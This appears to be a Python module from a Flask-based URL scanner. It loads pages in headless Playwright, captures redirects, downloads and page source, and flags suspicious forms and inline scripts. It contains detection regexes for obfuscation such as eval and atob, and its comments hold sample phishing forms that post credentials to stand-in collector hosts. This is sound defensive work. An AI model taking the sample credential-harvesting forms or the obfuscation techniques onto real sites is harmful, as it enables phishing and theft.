import json
import re
import uuid
from pathlib import Path
from typing import Any, Dict, Optional
from urllib.parse import urlparse

from bs4 import BeautifulSoup
from playwright.async_api import async_playwright, TimeoutError as PWTimeoutError

from flask import current_app  # access the rule engine from app config

from app.utils.io_helpers import safe_write
from .enrichment import enrich_url


def get_rule_engine() -> Optional[Any]:
    """
    Retrieve the rules engine instance from the Flask application config.

    Returns:
        RuleEngine or None: The engine if available, or None if not configured.
    """
    try:
        # current_app is only usable inside an active application context
        return current_app.config.get("RULE_ENGINE")
    except RuntimeError:
        # Raised when called outside a Flask application context; fail gracefully
        return None


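# A minimal sketch of how the engine is expected to be wired up at app startup.
# The RuleEngine class and its import path are hypothetical here; the actual
# constructor lives elsewhere in the project:
#
#     from app.rules import RuleEngine  # hypothetical import path
#
#     app.config["RULE_ENGINE"] = RuleEngine(rules_path="rules/")  # hypothetical ctor
#     with app.app_context():
#         engine = get_rule_engine()  # -> the configured RuleEngine instance

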
def run_rule_checks(text: str, category: str) -> Dict[str, Any]:
    """
    Run all rules for a given category against the provided text.

    Args:
        text (str): The content to test (e.g., form snippet, inline JS).
        category (str): The rule category to run (e.g., 'form' or 'script').

    Returns:
        dict: {
            "checks": [ { "rule": str, "category": str, "matched": bool, "reason": Optional[str] }, ... ],
            "summary": { "matched_count": int, "total_rules": int }
        }
    """
    result: Dict[str, Any] = {
        "checks": [],
        "summary": {
            "matched_count": 0,
            "total_rules": 0
        }
    }

    engine = get_rule_engine()
    if engine is None:
        # No engine configured; return an empty but well-formed structure
        return result

    try:
        # Run engine rules for the specified category
        check_results = engine.run_all(text, category=category)

        # Normalize results into the expected structure
        total = 0
        matched = 0

        for item in check_results:
            # item is expected to contain: rule, category, matched, reason (optional)
            total += 1
            if bool(item.get("matched")):
                matched += 1

            result["checks"].append({
                "rule": item.get("rule"),
                "category": item.get("category"),
                "matched": bool(item.get("matched")),
                "reason": item.get("reason")
            })

        result["summary"]["matched_count"] = matched
        result["summary"]["total_rules"] = total

    except Exception as e:
        # If anything goes wrong, keep the structure and add a synthetic failure entry
        result["checks"].append({
            "rule": "engine_error",
            "category": category,
            "matched": False,
            "reason": f"Rule engine error: {e}"
        })
        result["summary"]["matched_count"] = 0
        result["summary"]["total_rules"] = 0

    return result


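# Illustrative output, assuming a hypothetical rule named "external-action" in
# the 'form' category (rule names depend entirely on the loaded ruleset):
#
#     run_rule_checks("action=http://evil.example/post\nmethod=post", "form")
#     -> {"checks": [{"rule": "external-action", "category": "form",
#                     "matched": True, "reason": "Form posts to another host"}],
#         "summary": {"matched_count": 1, "total_rules": 1}}

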
def analyze_forms(html: str, base_url: str) -> list[dict]:
    """
    Parse forms from the page HTML and apply heuristic flags and rule-based checks.

    Args:
        html (str): The full page HTML.
        base_url (str): The final URL of the page (used for hostname comparisons).

    Returns:
        list[dict]: A list of form analysis dictionaries, each including:
            - action, method, inputs
            - flagged (bool), flag_reasons (list[str]), status (str)
            - rule_checks: dict with "checks" (list) and "summary" (dict)
    """
    soup = BeautifulSoup(html, "lxml")
    forms_info = []
    page_hostname = urlparse(base_url).hostname

    for form in soup.find_all("form"):
        action = form.get("action")
        method = form.get("method", "get").lower()

        # Build explicit inputs list
        inputs = []
        for inp in form.find_all("input"):
            inputs.append({
                "name": inp.get("name"),
                "type": inp.get("type", "text")
            })

        flagged_reasons = []

        # No action specified
        if not action or not str(action).strip():
            flagged_reasons.append("No action specified")

        # External host
        else:
            try:
                action_host = urlparse(str(action)).hostname
                # Relative actions have no hostname; only flag absolute (or
                # protocol-relative) URLs that submit to a different host.
                if action_host and action_host != page_hostname:
                    flagged_reasons.append("Submits to a different host")
            except Exception:
                # If hostname parsing fails, skip this condition quietly
                pass

        # HTTP form on HTTPS page
        try:
            if action and urlparse(str(action)).scheme == "http" and urlparse(base_url).scheme == "https":
                flagged_reasons.append("Submits over insecure HTTP")
        except Exception:
            # If scheme parsing fails, ignore
            pass

        # Hidden password / suspicious hidden inputs
        for hidden in form.find_all("input", type="hidden"):
            name_value = hidden.get("name") or ""
            if "password" in name_value.lower():
                flagged_reasons.append("Hidden password field")
                break  # one reason is enough, even if several such fields exist

        flagged = bool(flagged_reasons)

        # Serialize a simple form snippet for the rules engine to analyze (category='form')
        snippet_lines = [f"action={action}", f"method={method}", "inputs="]
        for item in inputs:
            snippet_lines.append(f"  - name={item.get('name')} type={item.get('type')}")
        form_snippet = "\n".join(snippet_lines)

        rule_checks = run_rule_checks(form_snippet, category="form")

        forms_info.append({
            "action": action,
            "method": method,
            "inputs": inputs,
            "flagged": flagged,
            "flag_reasons": flagged_reasons,
            "status": "flagged" if flagged else "possibly safe",
            "rule_checks": rule_checks
        })

    return forms_info


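# A quick illustrative run against a synthetic page (output abridged):
#
#     analyze_forms(
#         '<form action="http://collector.example/steal" method="post">'
#         '<input name="user"><input type="hidden" name="password_bak"></form>',
#         "https://shop.example/login",
#     )
#     -> [{"action": "http://collector.example/steal", "method": "post",
#          "flagged": True,
#          "flag_reasons": ["Submits to a different host",
#                           "Submits over insecure HTTP",
#                           "Hidden password field"], ...}]

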
def analyze_scripts(html: str, base_url: str = "", engine=None) -> list[dict]:
    """
    Analyze <script> elements using the RuleEngine (if provided) and
    lightweight built-in heuristics. Only append a record when at least
    one rule or heuristic matches, and always set a sensible 'type'.

    Returns a list of dicts like:
        {
            "type": "external" | "inline" | "unknown",
            "src": "...",                 # for external
            "content_snippet": "...",     # for inline
            "rules": [ { "name": "...", "description": "..." }, ... ],
            "heuristics": [ "reason1", "reason2", ... ]
        }
    """
    soup = BeautifulSoup(html, "lxml")
    results: list[dict] = []

    # Benign MIME types we ignore entirely
    benign_types = {"application/ld+json", "application/json"}

    # Suspicious file extensions for external scripts
    dangerous_ext = (".vbs", ".hta")

    # Inline red flags
    risky_inline_patterns = [
        (re.compile(r"\beval\s*\(", re.IGNORECASE), "Uses eval()"),
        (re.compile(r"\bnew\s+Function\s*\(", re.IGNORECASE), "Uses Function constructor"),
        (re.compile(r"\bdocument\.write\s*\(", re.IGNORECASE), "Uses document.write()"),
        (re.compile(r"\bActiveXObject\s*\(", re.IGNORECASE), "Uses ActiveXObject (IE-only)"),
        (re.compile(r"\batob\s*\(", re.IGNORECASE), "Uses atob() (possible obfuscation)"),
        (re.compile(r"\bunescape\s*\(", re.IGNORECASE), "Uses unescape() (legacy/obfuscation)"),
        (re.compile(r"\bset(?:Timeout|Interval)\s*\(\s*['\"`].+['\"`]\s*,", re.IGNORECASE),
         "String passed to setTimeout/setInterval"),
        (re.compile(r"[\"']?0x[0-9a-fA-F]{16,}[\"']?", re.IGNORECASE),
         "Contains long hex-like constants (possible obfuscation)"),
    ]

    base_host = urlparse(base_url).hostname or ""

    for script in soup.find_all("script"):
        try:
            src = (script.get("src") or "").strip()
            s_type_attr = (script.get("type") or "").strip().lower()

            # IMPORTANT: .string is often None; get_text() is reliable
            inline_text = script.get_text(strip=True) or ""

            # Skip benign structured data outright
            if s_type_attr in benign_types:
                continue

            # ---- Build facts for the rules engine
            facts = {
                "script_type_attr": s_type_attr or None,
                "has_src": bool(src),
                "src": src or None,
                "attrs": dict(script.attrs),
                "inline_len": len(inline_text),
                "inline_preview": inline_text[:200].replace("\n", " ") if inline_text else None,
                "base_url": base_url or None,
                "base_hostname": base_host or None,
                "src_hostname": urlparse(src).hostname if src else None,
            }

            # ---- Evaluate rules engine (using name/description)
            engine_matches: list[dict] = []
            if engine is not None:
                try:
                    if hasattr(engine, "evaluate_script"):
                        matches = engine.evaluate_script(facts)
                    elif hasattr(engine, "evaluate"):
                        matches = engine.evaluate(facts)
                    else:
                        matches = []

                    if isinstance(matches, list):
                        for m in matches:
                            if isinstance(m, dict) and "name" in m:
                                engine_matches.append({
                                    "name": m["name"],
                                    "description": m.get("description", "")
                                })
                            elif isinstance(m, str):
                                engine_matches.append({"name": m, "description": ""})
                except Exception as e:
                    engine_matches.append({"name": "Rules Engine Error", "description": str(e)})

            # ---- Built-in heuristics
            heuristics: list[str] = []
            if src:
                # Unusual URL schemes for script sources
                if src.startswith(("data:", "blob:")):
                    heuristics.append("Script src uses data:/blob: URL")
                # Dangerous extensions
                for ext in dangerous_ext:
                    if src.lower().endswith(ext):
                        heuristics.append(f"External script with dangerous extension ({ext.lstrip('.')})")
                        break
                # Third-party host hint
                src_host = facts.get("src_hostname") or ""
                if base_host and src_host and src_host != base_host:
                    heuristics.append(f"Third-party host: {src_host}")
            elif inline_text:
                for pat, why in risky_inline_patterns:
                    if pat.search(inline_text):
                        heuristics.append(why)

            # ---- Only append when something matched; always set type
            if engine_matches or heuristics:
                record: dict = {}

                if src:
                    record["type"] = "external"
                    record["src"] = src
                elif inline_text:
                    record["type"] = "inline"
                    record["content_snippet"] = facts.get("inline_preview")
                else:
                    record["type"] = "unknown"

                if engine_matches:
                    record["rules"] = engine_matches
                if heuristics:
                    record["heuristics"] = heuristics

                results.append(record)

        except Exception as e:
            # Never let a single broken <script> kill the whole analysis
            results.append({
                "type": "unknown",
                "heuristics": [f"Script analysis error: {e}"]
            })

    return results


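# Example record for an inline script on a hypothetical page that calls eval()
# on base64-decoded data (no engine passed, so only the heuristics fire):
#
#     analyze_scripts('<script>eval(atob("ZXZpbA=="));</script>')
#     -> [{"type": "inline",
#          "content_snippet": 'eval(atob("ZXZpbA=="));',
#          "heuristics": ["Uses eval()", "Uses atob() (possible obfuscation)"]}]

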
async def fetch_page_artifacts(url: str, storage_dir: Path, engine=None) -> Dict[str, Any]:
    """
    Fetch page artifacts and save them in a UUID-based directory.

    Args:
        url (str): URL to analyze.
        storage_dir (Path): Base /data path.
        engine: Optional rules engine instance (from app.config["RULE_ENGINE"]).

    Returns:
        dict: The analysis result, also persisted to results.json in the run directory.
    """
    run_uuid = str(uuid.uuid4())
    run_dir = storage_dir / run_uuid
    run_dir.mkdir(parents=True, exist_ok=True)

    screenshot_path = run_dir / "screenshot.png"
    source_path = run_dir / "source.txt"
    results_path = run_dir / "results.json"

    redirects = []
    downloads = []
    scripts = []

    async with async_playwright() as pw:
        browser = await pw.chromium.launch(
            headless=True,
            args=["--no-sandbox", "--disable-dev-shm-usage", "--disable-blink-features=AutomationControlled"]
        )
        context = await browser.new_context(
            viewport={"width": 1920, "height": 1080},
            user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36",
            java_script_enabled=True,
            locale="en-US"
        )
        page = await context.new_page()

        # Event handlers: capture redirect responses, downloads, and script-like requests
        page.on("response", lambda resp: redirects.append({"status": resp.status, "url": resp.url}) if 300 <= resp.status <= 399 else None)
        page.on("download", lambda d: downloads.append({"url": d.url, "suggested_filename": d.suggested_filename}))
        page.on("request", lambda r: scripts.append(r.url) if r.url.endswith((".js", ".vbs", ".hta")) else None)

        try:
            await page.goto(url, wait_until="networkidle", timeout=60000)
            final_url = page.url
            await page.screenshot(path=str(screenshot_path), full_page=True)
            html = await page.content()
            safe_write(source_path, html)
        except PWTimeoutError:
            # Capture whatever loaded before the timeout
            final_url = page.url
            safe_write(source_path, "Page did not fully load (timeout)")
            await page.screenshot(path=str(screenshot_path), full_page=True)

        await context.close()
        await browser.close()

    html_content = source_path.read_text(encoding="utf-8")
    forms_info = analyze_forms(html_content, final_url)
    suspicious_scripts = analyze_scripts(html_content, base_url=final_url, engine=engine)

    enrichment = enrich_url(url)

    result = {
        "uuid": run_uuid,
        "submitted_url": url,
        "final_url": final_url,
        "redirects": redirects,
        "downloads": downloads,
        "scripts": scripts,
        "forms": forms_info,
        "suspicious_scripts": suspicious_scripts,
        "enrichment": enrichment
    }

    safe_write(results_path, json.dumps(result, indent=2))
    return result
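

# A minimal driver sketch for local testing, assuming Playwright's Chromium is
# installed (`playwright install chromium`) and that running without a rules
# engine (engine=None) is acceptable:
#
#     import asyncio
#     from pathlib import Path
#
#     if __name__ == "__main__":
#         artifacts = asyncio.run(
#             fetch_page_artifacts("https://example.com", Path("data"))
#         )
#         print(artifacts["final_url"], len(artifacts["forms"]))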